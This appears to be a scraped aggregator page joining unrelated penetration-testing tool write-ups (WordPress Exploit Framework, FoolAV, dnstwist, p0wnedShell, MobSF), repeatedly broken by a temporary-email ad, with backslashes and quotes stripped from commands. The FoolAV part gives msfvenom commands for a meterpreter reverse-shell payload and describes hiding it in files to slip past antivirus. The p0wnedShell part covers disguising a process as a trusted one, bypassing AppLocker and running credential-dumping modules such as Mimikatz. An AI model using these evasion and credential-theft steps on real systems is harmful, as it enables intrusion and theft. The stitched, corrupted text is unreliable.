WordPress Exploit Framework – A Ruby Tool For WordPress Penetration Testing

To install the latest stable build, run  gem install wpxf .

After installation, you can launch the WordPress Exploit Framework console by running  wpxf .

If you have issues installing WPXF’s dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:


It’s possible that you don’t have important development header files installed on your system. Here’s what you should do if you should find yourself in this situation:

If you are experiencing errors that indicate that  libcurl.dll  could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment’s PATH variable.

The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as  Win32 2000/XP zip 7.40.0 libcurl SSL . After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don’t overwrite any existing DLLs).

How To Use WordPress Exploit Framework

Start the WordPress Exploit Framework console by running  wpxf .

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the  search  command or load a module using the  use  command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using  info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

FoolAV – Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV - Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV is a tool for antivirus evasion and running arbitrary payload on target Wintel host.

It is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files:  binary executable  and  payload file  into the same directory.

Usage:

1. Prepare your payload (x86), i.e.

  • calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b “x00x0ax0dxff” -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf  (you dont really need to use any encoder or characters blacklisting, it will work anyway)
  • meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=… -a x86 -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf 

2. Copy payload file  [executable-name-without-exe-extension].mf  in the same directory as executable payload running calc.exe generated using above command:

3. Once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

FoolAV Calc Screenshot

Notes:

  • x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that,  load kiwi  will load x86_64 version making it possible to access juicy contents of LSASS process memory 🙂
FoolAV Meterpreter Screenshot
  • .mf payload file can be obfuscated – parser will ignore every character other than  xHH  hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:
FoolAV.mf Screenshot


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

dnstwist – Domain Name Permutation Engine for Detecting Typo Squatting, Phishing and Corporate Espionage

This is going to install dnstwist.py as dnstwist only, along with all requirements mentioned above. The usage is the same, you can just omit the file extension, and the binary will be added to PATH.

How To Use dnstwist

To start, it’s a good idea to enter only the domain name as an argument. The tool will run it through its fuzzing algorithms and generate a list of potential phishing domains with the following DNS records: A, AAAA, NS and MX.

$ dnstwist.py example.com

Usually generated list of domains has more than a hundred of rows – especially for longer domain names. In such cases, it may be practical to display only registered (resolvable) ones using –registered argument.

$ dnstwist.py --registered example.com

Manually checking each domain name in terms of serving a phishing site might be time-consuming. To address this, dnstwist makes use of so-called fuzzy hashes (context triggered piecewise hashes). Fuzzy hashing is a concept which involves the ability to compare two inputs (in this case HTML code) and determine a fundamental level of similarity. This unique feature of dnstwist can be enabled with –ssdeep argument. For each generated domain, dnstwist will fetch content from responding  HTTP server (following possible redirects) and compare its fuzzy hash with the one for the original (initial) domain. The level of similarity will be expressed as a percentage. Please keep in mind it’s rather unlikely to get 100% match for a dynamically generated web page, but each notification should be inspected carefully regardless of the percentage level.

$ dnstwist.py --ssdeep example.com

In some cases, phishing sites are served from a specific URL. If you provide a full or partial URL address as an argument, dnstwist will parse it and apply for each generated domain name variant. This ability is obviously useful only in conjunction with fuzzy hashing feature.

$ dnstwist.py --ssdeep https://example.com/owa/
$ dnstwist.py --ssdeep example.com/crm/login

Very often attackers set up e-mail honeypots on phishing domains and wait for mistyped e-mails to arrive. In this scenario, attackers would configure their server to vacuum up all e-mail addressed to that domain, regardless of the user it was sent towards. Another dnstwist feature allows to perform a simple test on each mail server (advertised through DNS MX record) in order to check which one can be used for such hostile intent. Suspicious servers will be marked with SPYING-MX string.

Please be aware of possible false positives. Some mail servers only pretend to accept incorrectly addressed e-mails but then discard those messages. This technique is used to prevent a directory harvest attack.

$ dnstwist.py --mxcheck example.com

Not always domain names generated by the fuzzing algorithms are sufficient. To generate even more domain name variants please feed dnstwist with a dictionary file. Some dictionary samples with a list of the most common words used in targeted phishing campaigns are included. Feel free to adapt it to your needs.

$ dnstwist.py --dictionary dictionaries/english.dict example.com

Apart from the default nice and colorful text terminal output, the tool provides two well known and easy to parse output formats: CSV and JSON. Use it for data interchange.

$ dnstwist.py --csv example.com > out.csv
$ dnstwist.py --json example.com > out.json

The tool is shipped with built-in GeoIP database. Use –geoip argument to display geographical location (country name) for each IPv4 address.

$ dnstwist.py --geoip example.com

Of course, all of the features offered by dnstwist together with brief descriptions are always available at your fingertips:

$ dnstwist.py --help


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

p0wnedShell – PowerShell Runspace Post Exploitation Toolkit

p0wnedShell - PowerShell Runspace Post Exploitation Toolkit

p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier.

What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.

How To Compile It:

To compile p0wnedShell you need to open this project within Microsoft Visual Studio and build it for the x64/x86 platform. You can change the following AutoMasq options before compiling:

public static bool AutoMasq = true;

public static string masqBinary = @”C:WindowsNotepad.exe”;

How To Use It:

With AutoMasq set to false, you just run the executable so it runs normally. With AutoMasq enabled, you could rename the p0wnedShell executable as the process you’re going to masquerade (masqBinary), so it has the appearance of that process (for example notepad.exe).

Using the optional “-parent” commandline argument, you can start p0wnedShell using another Parent Process ID. When combining the PEB Masq option and different parent process ID (for example svchost), you can give p0wnedShell the appearance of a legitimate service 😉

Note:Running p0wnedShell using another Parent Process ID doesn’t work from a Meterpreter session/shell…. yet!

Changing the Parent Process ID can also be used to spawn a p0wnedShell process 
with system privileges, 
for example using lsass as the the parent process.
For this you need to have UAC elevated administrator permissions.

C:p0wnedShell>p0wnedShellx64.exe -parent
 
 [+] Please enter a valid Parent Process name.
 [+] For Example: C:p0wnedShellp0wnedShellx64.exe -parent svchost
 
C:p0wnedShell>p0wnedShellx64.exe -parent lsass

To run as x86 binary and bypass Applocker (Credits for this great bypass go to Casey Smith aka subTee):

cd WindowsMicrosoft.NETFrameworkv4.0.30319 (Or newer .NET version folder)

InstallUtil.exe /logfile= /LogToConsole=false /U C:p0wnedShellp0wnedShellx86.exe

To run as x64 binary and bypass Applocker:

cd WindowsMicrosoft.NETFramework64v4.0.30319 (Or newer .NET version folder)

InstallUtil.exe /logfile= /LogToConsole=false /U C:p0wnedShellp0wnedShellx64.exe

What’s inside the runspace:

The following PowerShell tools/functions are included:

  • PowerSploit: Invoke-Shellcode
  • PowerSploit: Invoke-ReflectivePEInjection
  • PowerSploit: Invoke-Mimikatz
  • PowerSploit: Invoke-TokenManipulation
  • PowerSploit: PowerUp and PowerView
  • Rasta Mouse: Sherlock
  • HarmJ0y’s: Invoke-Psexec and Invoke-Kerberoast
  • Rohan Vazarkar’s: Invoke-BloodHound (C# Ingestor)
  • Chris Campbell’s: Get-GPPPassword
  • Tim Medin’s: GetUserSPNS
  • Besimorhino’s: PowerCat
  • Nishang: Copy-VSS and Invoke-Encode
  • Nishang: Invoke-PortScan and Get-PassHashes
  • Kevin Robertson: Invoke-Tater, Invoke-SMBExec and Invoke-WMIExec
  • Kevin Robertson: Invoke-Inveigh and Invoke-InveighRelay
  • FuzzySecurity: Invoke-MS16-032 and Invoke-MS16-135

Powershell functions within the Runspace are loaded in memory from Base64 encode and compressed strings.

Binaries are loaded in memory using ReflectivePEInjection (Byte arrays are compressed using Gzip and saved within p0wnedShell as Base64 encoded strings).


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Unicorn-Bios – Basic BIOS Emulator for Unicorn Engine


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Mobile Security Framework (MobSF) – An All-In-One Mobile Application Security Assessment Framework

Mobile Security Framework (MobSF) - An All-In-One Mobile Application Security Assessment Framework

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

MobSF support mobile app binaries (APK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.

Screenshots:

  • Static Analysis – Android
MobSF Android Static Analysis Screenshot

Requirements:

  • Mac:
    • Install Git
    • Install Python 3.6 – 3.7 (3.8 is not supported)
    • macOS Catalina users must uninstall existing python3 and install the one from Python.org. After installation, go to /Applications/Python 3.7/ and run Install Certificates.command and Update Shell Profile.command
    • Install JDK 8+
    • Install command line tools xcode-select –install
    • Download & Install wkhtmltopdf as per the wiki instructions
    • macOS Mojave users, install headers if available: 

  • Ubuntu/Debian based Linux:
    • Install Git sudo apt get install git
    • Install Python 3.63.7 sudo apt-get install python3
    • Install JDK 8+ sudo apt-get install openjdk-8-jdk
    • Install the following dependencies 

If you are running MobSF in Windows host, you do not have to configure anything, apart from interacting with the automated installation script for the first time when you run MobSF. However, if you are using a different host OS, you need to configure a Windows VM. Sadly binskim is only available on Windows. So even for static analysis, a Windows VM is required.
Steps on the Windows-VM:

  • Install the following requirements on the VM
    • Python 3
    • rsa (via python -m pip install rsa)
  • Download the setup.py script and run it
  • There is some manual interaction, but if there are no errors, everything is good and the RPC-Server should be running.

Remember: Use separate Windows-VM for MobSF and don’t expose it to a network range where an attack might be coming from. The best solution is to set it to host-only mode.

  • To integrate a Windows-VM into MobSF, please follow these steps. 
    • Get the IP of you VM and set in the MobSF/settings.py-File (search for WINDOWS_VM_IP)
    • (If not yet done:) Copy the private rsa key from the vm to MobSF

If you see errors like this:

MobSF setup script assume that your VM or host Windows box have a C Drive and you have all the permissions to perform read/write operations in C:MobSF. This error occurs if you don’t have proper read/write permissions.

IMPORTANT:

  • Set JAVA_HOME environment variable.
  • iOS IPA Analysis works only on Mac, Linux and Docker containers.

Dynamic Analysis:

  • Dynamic Analysis will not work if you use MobSF docker container or setup MobSF inside a Virtual Machine.
  • Install Genymotion

Installation:

Tested on Windows 10, Ubuntu (18.04, 19.04) , macOS Catalina

IMPORTANT: Windows users, before running setup.bat close any opened folders of MobSF or text editors with MobSF opened. Either of these can interrupt the setup by causing permission errors.

Running MobSF

  • For Linux and Mac: ./run.sh
  • For Windows: run.bat

You can navigate to http://localhost:8000/ to access MobSF web interface.

Configuring Dynamic Analyzer

Dynamic analysis using a real mobile phone is not supported.

Run a Genymotion Android VM before starting MobSF. Everything will be configured automatically at runtime. MobSF requires Genymotion Android x86 VMs version 4.1 to 9.0 for dynamic analysis. We recommend using Android 7.0 and above.

Android versions 5 and above are automatically MobSFyed on first run. For Android versions less than 5, you must MobSFy the Android Runtime prior to Dynamic Analysis for the first time. Click MobSFy Android Runtime button in Dynamic Analysis page to MobSFy the android runtime environment.


HTTPS Proxy

  • For Android versions 4.4 – 9.0, global proxy settings are automatically applied at runtime.
  • For Android version 4.1 – 4.3, set Android VM proxy as displayed in Dynamic Analysis page.

If Dynamic Analyzer doesn’t detect your android device, you need to manually configure ANALYZER_IDENTIFIER in MobSF/settings.py. Example: ANALYZER_IDENTIFIER = ‘192.168.56.101:5555’. You can find the Android Device IP from the Genymotion title bar and the default port is 5555.

MobSF Docker Container

Lazy to setup MobSF? Use the latest MobSF docker image (Dynamic Analysis is not supported)

MobSF e-Learning Courses & Certification

We have 2 self paced e-learning courses that covers MobSF and other Android Security tools.

  • OpSecX – Automated Mobile Application Security Assessment with MobSF – MAS (Currently being updated)
  • OpSecX – Android Security Tools Expert – ATX

Updating MobSF

If you are updating MobSF, In most cases you might have to perform database migrations or you will see errors such as

Run the below command to migrate your db

If the above changes didn’t work, you might have to run setup.sh or setup.bat again which will delete your previous scan results.

APKiD

APKiD is enabled by default. To disable it, set APKID_ENABLED to False in MobSF/settings.py.

VirusTotal Scan

VirusTotal Scan is disabled by default. You need to add your VirusTotal API Key before enabling it.

AppMonsta Android Play Store Information

We use AppMonsta API to fetch details from Google Play Store as a fail safe to our primary implementation. It is disabled by default. To enable it, you need AppMonsta API Key.

  • Get AppMonsta API Key from: AppMonsta API Key
  • In MobSF/settings.py, add your API Key to APPMONSTA_KEY and restart MobSF.

Mass Static Analysis

MobSF supports mass static analysis. Here is how to run a mass static analysis:

  • Run mass_static_analysis.py

Example: python mass_static_analysis.py -s 127.0.0.1:8000 -d /home/files/ 

Using Postgres DB instead of SQLite:

Install psycopg2: pip3 install psycopg2-binary

Go to MobSFsettings.py

Comment the following:

Now uncomment the following:

Create a database in Postgres named mobsf and configure the above settings with correct username, password and other details.

Apply Migrations:

Now you can start MobSF server and you have successfully configured Postgres as your database.

If you want all user uploads, downloads and user configurations to be created in home directory, enable home directory support:

To provide personalized version of MobSF to multiple users on an OS or to bundle MobSF with a pentesting distro you might need the home directory support enabled.

To enable Home Directory support, go to settings.py and set USE_HOME to True.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.